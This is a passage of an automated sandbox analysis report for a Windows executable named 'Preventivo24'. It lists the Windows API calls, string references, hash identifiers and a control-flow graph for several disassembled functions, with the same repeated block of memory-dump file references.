                                                                              • LoadLibraryW.KERNEL32(ComCtl32.dll,B5580983,?,00000000,00000000), ref: 00FC0CDA
                                                                              • GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00FC0D00
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00FC0D89
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: ComCtl32.dll$LoadIconMetric
                                                                              • API String ID: 145871493-764666640
                                                                              • Opcode ID: cff6c63f94b65668290379668171cc66a801d3db8a68efe0939b686b15068f2e
                                                                              • Instruction ID: c4cbf96ba0fcb4c8f4128862d59e2a1199600298cb585d0a086547dd688cfb06
                                                                              • Opcode Fuzzy Hash: cff6c63f94b65668290379668171cc66a801d3db8a68efe0939b686b15068f2e
                                                                              • Instruction Fuzzy Hash: 38319F71A00219EFCB188F95C919BAFBBB8FB45750F000229FC25A3380DB359D01DBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FF4CBA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DiskFreeSpace
                                                                              • String ID: \$\$\
                                                                              • API String ID: 1705453755-3791832595
                                                                              • Opcode ID: d88349a442f7fd43080b5d07339f2d7d6ab65481341e54af04b178ed09b0cdf9
                                                                              • Instruction ID: 319bb1c666377f942e84193df7daccdc8b2f23dcd8faaf2b2bf7b30c9f7faf0c
                                                                              • Opcode Fuzzy Hash: d88349a442f7fd43080b5d07339f2d7d6ab65481341e54af04b178ed09b0cdf9
                                                                              • Instruction Fuzzy Hash: C5410622E15219CACB30DF2484406BBB7F4FF95364F155A2EEAD8D3160F761ADC49386
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                                              • API String ID: 0-2308371840
                                                                              • Opcode ID: 25b6d2c7003f804161a159aff56546011cd1ad2ea92b67647be5751552771e4a
                                                                              • Instruction ID: d5a1d875a4186e5dd7f3aa066372afc72bae7cf7bf55e6fa932185fc4684a3db
                                                                              • Opcode Fuzzy Hash: 25b6d2c7003f804161a159aff56546011cd1ad2ea92b67647be5751552771e4a
                                                                              • Instruction Fuzzy Hash: C032F170E00248DFDB18DFA4CD59BEEBBB1BF49314F248259E405BB281DB746A84CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              • FindFirstFileW.KERNEL32(?,?,00000000,00000000,?,?), ref: 00FE94BF
                                                                              • FindClose.KERNEL32(00000000), ref: 00FE9503
                                                                              • CloseHandle.KERNEL32(?,?), ref: 00FE9801
                                                                                • Part of subcall function 0100A2E0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,B5580983,?,?,?,?,?,?,010E5C7D), ref: 0100A344
                                                                              • CloseHandle.KERNEL32(?,?), ref: 00FE99CB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Close$FileFindHandle$CreateFirstHeapProcess
                                                                              • String ID:
                                                                              • API String ID: 1937692618-0
                                                                              • Opcode ID: ce0bb8898bd71a5d090e4c7abcafa6aa0c69cfd336e7094b7859e45c305d7ba7
                                                                              • Instruction ID: 14e66a28a7d5714098910191ec5ef93deadff3501b1f420449e0d615b841a460
                                                                              • Opcode Fuzzy Hash: ce0bb8898bd71a5d090e4c7abcafa6aa0c69cfd336e7094b7859e45c305d7ba7
                                                                              • Instruction Fuzzy Hash: 2C528930D04A98CFDB24CB28CD547AEBBB1AF49315F1482D9D819A7382DB74AE85DF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadStringW.USER32(?,?,?,00000100), ref: 00FC5A13
                                                                              • LoadStringW.USER32(?,?,?,00000001), ref: 00FC5B33
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00FC5CCE
                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 00FC5CF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: String$Load$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 1561515232-0
                                                                              • Opcode ID: 74f88f926ffefa5f5956874890f62cc9f06982258cf6505dbff5d043b81562c0
                                                                              • Instruction ID: b788acf5c88c17e4e0bea721a8958d810027cdf0167a5edcc764f2209f7e33f5
                                                                              • Opcode Fuzzy Hash: 74f88f926ffefa5f5956874890f62cc9f06982258cf6505dbff5d043b81562c0
                                                                              • Instruction Fuzzy Hash: DDC1A071D00649DFDB04DFA8C945BEEBBB5FF44314F24822EE415AB280EB746A84DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00FEBA31,?,?,?), ref: 0108A23F
                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 0108A246
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 0108A28C
                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 0108A293
                                                                                • Part of subcall function 0108A0D8: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,0108A282,?,?,?,?), ref: 0108A0FC
                                                                                • Part of subcall function 0108A0D8: HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 0108A103
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Alloc$Free
                                                                              • String ID:
                                                                              • API String ID: 1864747095-0
                                                                              • Opcode ID: 134e8d93fd8a121d9ab060e0c9e4400d803d57d448fde5372db14eac7f0043a1
                                                                              • Instruction ID: 9973d1beabd67555658412b604b091fe39e15627fbffbe4c8bda3d0ec87cd539
                                                                              • Opcode Fuzzy Hash: 134e8d93fd8a121d9ab060e0c9e4400d803d57d448fde5372db14eac7f0043a1
                                                                              • Instruction Fuzzy Hash: F9F0F07270C322D7C77936BC7D0895B7A64ABC1A61701487AF4D6C3688CE21C8418760
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00000000), ref: 00FBD79F
                                                                              • FindClose.KERNEL32(00000000), ref: 00FBD7FE
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Find$AllocateCloseFileFirstHeap
                                                                              • String ID:
                                                                              • API String ID: 1673784098-0
                                                                              • Opcode ID: 698c9f14846b31c07112aa215b107677127bf7d968355893256e9ff61853c2f2
                                                                              • Instruction ID: 7f195e53a3915e82bc9b32d69a3791f441d44d42dfadb762412d3523ccbdcf46
                                                                              • Opcode Fuzzy Hash: 698c9f14846b31c07112aa215b107677127bf7d968355893256e9ff61853c2f2
                                                                              • Instruction Fuzzy Hash: 8C31E331904208CBCB28DF56C948BDAB7B8EB48320F2082ADE91997380E7359D44DF42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00F77412
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,010EB76D,000000FF), ref: 00F774E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                              • String ID:
                                                                              • API String ID: 2891229163-0
                                                                              • Opcode ID: a011087b38ddb3615ad9f4a8f465981a60f35bc7b42040748c9d549efeaa00f6
                                                                              • Instruction ID: a6662d7a7a464aa9ca7783e9eed44183a3bc49bf279f0a2d9abf8d6c7c294ab1
                                                                              • Opcode Fuzzy Hash: a011087b38ddb3615ad9f4a8f465981a60f35bc7b42040748c9d549efeaa00f6
                                                                              • Instruction Fuzzy Hash: 48A17BB0904705EFE714DF64C858B9ABBF0FB04318F14825ED8699B781D7BAA618CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,00000000,B5580983,?,?,00000000), ref: 01003B5B
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,00000000,B5580983,?,?,00000000), ref: 01003B81
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Create$FileNamedPipe
                                                                              • String ID:
                                                                              • API String ID: 1328467360-0
                                                                              • Opcode ID: a87d246cfd7bf89ad82874abb1546fb38ddc1ce13e3e5591c80dc4827721016b
                                                                              • Instruction ID: b6ec130f1fe87af75b175d2b8265177b76ec34457da308dc151d4b88d05b6fc0
                                                                              • Opcode Fuzzy Hash: a87d246cfd7bf89ad82874abb1546fb38ddc1ce13e3e5591c80dc4827721016b
                                                                              • Instruction Fuzzy Hash: 5531D531A44746AFE7228F28DC01B99FBA5FB05720F10866EF665AB7C0D775A500CB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • __set_se_translator.LIBVCRUNTIME ref: 00EC2538
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00FBC550), ref: 00EC254E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                              • String ID:
                                                                              • API String ID: 2480343447-0
                                                                              • Opcode ID: bc1e69381aa1c966bd901783944eb50f4fa275638fa4b82da091ef8b75aac2d9
                                                                              • Instruction ID: 68c40adabdc2a3895bd7fa031cd4adb9a77174c6be571ee6b580854d1614b588
                                                                              • Opcode Fuzzy Hash: bc1e69381aa1c966bd901783944eb50f4fa275638fa4b82da091ef8b75aac2d9
                                                                              • Instruction Fuzzy Hash: C7E0D876614200AFC6206366ED08F8ABF75BB95711F44002AF29153294C76058459BA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 79870ca2a7959b104a9ae3e5ab3443b4688318babcf8b09555fbc1bdcfe2c44b
                                                                              • Instruction ID: 7cb23aa28faae9399b5953ca54ac1802ad6e543f099d326da90832bf0011c117
                                                                              • Opcode Fuzzy Hash: 79870ca2a7959b104a9ae3e5ab3443b4688318babcf8b09555fbc1bdcfe2c44b
                                                                              • Instruction Fuzzy Hash: F2716CB0A0070ADFD749CF64C59439ABBE0BF04308F54816DD5589B782DB7AA91ACFC0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 278 fc2fe0-fc3062 RegOpenKeyExW 281 fc3068-fc3097 RegQueryValueExW 278->281 282 fc32d2-fc32eb 278->282 285 fc3099-fc30ab call fc8ae0 281->285 286 fc30e7-fc3116 RegQueryValueExW 281->286 283 fc32ed-fc32f4 RegCloseKey 282->283 284 fc32fe-fc3319 call 108a6f5 282->284 283->284 296 fc30bc-fc30d3 call fc8ae0 285->296 297 fc30ad-fc30ba 285->297 286->282 287 fc311c-fc312d 286->287 290 fc312f 287->290 291 fc313a-fc313c 287->291 294 fc3130-fc3138 290->294 291->282 295 fc3142-fc3149 291->295 294->291 294->294 298 fc3150-fc315e call fc8ae0 295->298 303 fc30da-fc30e0 296->303 304 fc30d5 296->304 299 fc30e2 297->299 306 fc3169-fc3177 call fc8ae0 298->306 307 fc3160-fc3164 298->307 299->286 303->299 304->303 312 fc3179-fc317d 306->312 313 fc3182-fc3190 call fc8ae0 306->313 308 fc32a4 307->308 311 fc32ab-fc32b8 308->311 314 fc32ca-fc32cc 311->314 315 fc32ba 311->315 312->308 319 fc319b-fc31a9 call fc8ae0 313->319 320 fc3192-fc3196 313->320 314->282 314->298 317 fc32c0-fc32c8 315->317 317->314 317->317 323 fc31ab-fc31af 319->323 324 fc31b4-fc31c2 call fc8ae0 319->324 320->308 323->308 327 fc31cd-fc31db call fc8ae0 324->327 328 fc31c4-fc31c8 324->328 331 fc31dd-fc31e1 327->331 332 fc31e6-fc31f4 call fc8ae0 327->332 328->308 331->308 335 fc31ff-fc320d call fc8ae0 332->335 336 fc31f6-fc31fa 332->336 339 fc320f-fc3214 335->339 340 fc3219-fc3227 call fc8ae0 335->340 336->308 341 fc32a1 339->341 344 fc3229-fc322e 340->344 345 fc3230-fc323e call fc8ae0 340->345 341->308 344->341 348 fc3247-fc3255 call fc8ae0 345->348 349 fc3240-fc3245 345->349 352 fc325e-fc326c call fc8ae0 348->352 353 fc3257-fc325c 348->353 349->341 356 fc326e-fc3273 352->356 357 fc3275-fc3283 call fc8ae0 352->357 353->341 356->341 360 fc328c-fc329a call fc8ae0 357->360 361 fc3285-fc328a 357->361 360->311 364 fc329c 360->364 361->341 364->341
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00FC305A
                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?,?), ref: 00FC308F
                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00FC310E
                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00FC32EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
